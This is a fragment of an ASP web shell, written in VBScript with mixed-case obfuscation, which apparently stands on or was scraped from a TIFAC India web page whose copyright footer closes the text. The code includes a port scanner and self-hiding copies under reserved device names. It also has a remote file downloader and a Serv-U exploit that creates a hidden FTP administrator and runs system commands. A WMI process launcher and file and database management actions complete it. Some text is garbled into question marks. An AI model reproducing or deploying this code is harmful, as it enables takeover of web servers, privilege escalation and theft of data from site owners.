    ") eND If END if neXt Next END if next TIMER2 = timER tHetImE=CStr(INt(TIMEr2-TImEr1)) jb"
    Process in "&TheTImE&" s" EnD iF enD suB suB SCAN(TaRgETIP, poRTnUM) oN error ReSUMe nExt set coNN = sERvEr.createObJect(OBT(5,0)) ConnstR="Provider=SQLOLEDB.1;Data Source=" & tARgETIp &","& PoRtNUm &";User ID=lake2;Password=;" CoNN.COnNECtiOnTImeout = 1 CONn.OPen coNNSTr If err tHeN if ERr.NuMbEr = -2147217843 or eRR.NUmBer = -2147467259 Then If INStr(err.dEsCriptIoN, "(Connect()).") > 0 THEn jb(taRgEtIP & ":" & pORtnuM & ".........??
    ") ELSE jb(TarGETIP & ":" & pOrTNum & ".........??
    ") enD IF enD iF END if eND sUB function lIl(bb) but=22 for i = 1 to len(bb) if mid(bb,i,1)<>"?" then If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then a = a & Chr(Asc(Mid(bb, i, 1))) else pk=asc(mid(bb,i,1))-but if pk>126 then pk=pk-95 elseif pk<32 then pk=pk+95 end if a=a&chr(pk) end if else a=a&vbcrlf end if next lIl=a end function sub hiddenshell jb"" if request("se")="hidden" then fpath=request.servervariables("path_translated") set fso=server.createobject("scripting.filesystemobject") pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9" rndpex=split(pex,"|")(rndnumber(0,17)) session("seljw")="" filepath1=server.mappath(".") filename1=right(fpath,len(fpath)-instrrev(fpath,"\")) url=request.servervariables("url") url=left(url,instrrev(url,"/"))&rndpex&"."&filename1 fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1 set fso=nothing jb "" end if end sub Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function function dx(str):dx=StrReverse(str):end function:Function upload():SI="
    " :jb" ??????:???...????.?????
    ":jb"":jb "
    ":If isDebugMode = False Then:On Error Resume Next:End If:Dim Http, theUrl, thePath, stream, fileName, overWrite:theUrl = Request("theUrl"):thePath = Request("thePath"):overWrite = Request("overWrite"):Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream"):Set Http = Server.CreateObject("MSXML2.XMLHTTP"):If overWrite <> 2 Then:overWrite = 1:End If Http.Open "GET", theUrl, False Http.Send() If Http.ReadyState <> 4 Then End If With stream .Type = 1 .Mode = 3 .Open .Write Http.ResponseBody .Position = 0 .SaveToFile thePath, overWrite If Err.Number = 3004 Then Err.Clear fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/"))) If fileName = "" Then fileName = "index.htm.txt" End If thePath = thePath & "\" & fileName .SaveToFile thePath, overWrite jb"error,????????????????????? ??? ? ????? ???????" End If .Close End With chkErr(Err) Set Http = Nothing Set Stream = Nothing If isDebugMode = False Then On Error Resume Next End If End Function sEleCt cASe aCtiON CasE "MainMenu":MAInMEnu() CASE "GetTerminalInfo":GetTerminalInfo() CAse "PageAddToMdb":paGEaddtoMdB() cASE "ScanPort":SCAnPoRt() Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=M_Schumacher|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case SUaction case 1 set a=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/M_Schumacher/upadmin/s1",True, "", "" a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit set session("a")=a jb"" jb"" case 2 set b=Server.CreateObject("Microsoft.XMLHTTP") b.open "GET", "http://127.0.0.1:" & ftpport & "/M_Schumacher/upadmin/s2", True, "", "" b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit set session("b")=b jb"" jb"" case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") c.open "GET", "http://127.0.0.1:" & port & "/M_Schumacher/upadmin/s3", True, "", "" c.send loginuser & loginpass & mt & deldomain & quit set session("c")=c jb"
    ????,???????
    "&cmd&"

    " jb"" jb"
    " case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing jb"
    " end select function Gpath() on error resume next err.clear set f=Server.CreateObject(oBt(0,0)) if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function case "Alexa" dim AlexaUrl,Top AlexaUrl=request("u") Top=Alexa(AlexaUrl) if AlexaUrl="" then AlexaUrl=""&sba&"" SI="
    ":For i=0 To 18:SI=SI&"" Next echo SI Err.Clear function Alexa(AlexaURL) on error resume next dim getsms,getstr,url dim star,endd url="http://data.alexa.com/data?cli=10&dat=snba&url="&AlexaURL getsms=getHTTPPage(url) if getsms<>"" then star=instr(getsms,"") getstr=mid(getsms,star,endd-star-4) else getstr="???" end if if IsNumeric(getstr)=false then getstr="???" Alexa=getstr end function function getHTTPPage(url) on error resume next dim http set http=Server.createobject("Microsoft.XMLHTTP") Http.open "GET",url,false Http.send() if Http.readystate<>4 then getHTTPPage="" exit function end if getHTTPPage=bytes2BSTR(Http.responseBody) set http=nothing if err.number<>0 then err.Clear end function Function bytes2BSTR(vIn) dim strReturn dim i1,ThisCharCode,NextCharCode strReturn = "" For i1 = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i1,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i1+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i1 = i1 + 1 End If Next bytes2BSTR = strReturn :Err.Clear:End Function:Case "WMI":if request("ok")<>"" then:set ww=server.createobject("wbemscripting.swbemlocator"):set cc=ww.connectserver(request("ok")):set ss=cc.get("Win32_ProcessStartup"):Set oC=ss.SpawnInstance_:oC.ShowWindow=12:Set pp=cc.get("Win32_Process"):pp.create "net user",null,oC,intProcessID:jb""
    ""&intProcessID:else:jb("":end if:function Unlin(bb):for i = 1 to len(bb):if mid(bb,i,1)<>"?" then: tmp = Mid(bb, i, 1) + tmp:else:tmp=vbcrlf&tmp:end if:next:Unlin=tmp:end function: Case "ReadREG":call ReadREG():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "UpFile":UpFile():Case "ScanDriveForm":ScanDriveForm:Case "ScanDrive":ScanDrive Request("Drive"):Case "ScFolder":ScFolder Request("Folder"):Case "Course":Course():Case "AdminUser":AdminUser():case "hiddenshell":hiddenshell():Case "chamacode":Case "Cmd1Shell":Cmd1Shell():Case "Upload":Upload():case "MMD":MMD():case "SetFileText":SetFileText():Case "radmin":radmin():Case "suftp":suftp():Case "goback":goback():Case "php":php():Case "apjdel":apjdel():Case "pcanywhere4":pcanywhere4():Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case Else MainForm():End Select if Action<>"Servu" then ShowErr() jb"" %>
    ???????
    ???? "&WoriNima&"
    ????? "&now&"
    ???CPU?? "&jbmc&"
    ??????? "&jbmb&"
    WEB????? "&woriniba&"
    "&ObT(i,0)&" "&ObT(i,1)&" "&ObT(i,2)&"
  • © 2009, TIFAC, India. All rights reserved.
    Our new media partner: Inomy Media
    Give Feedback Or Contact Us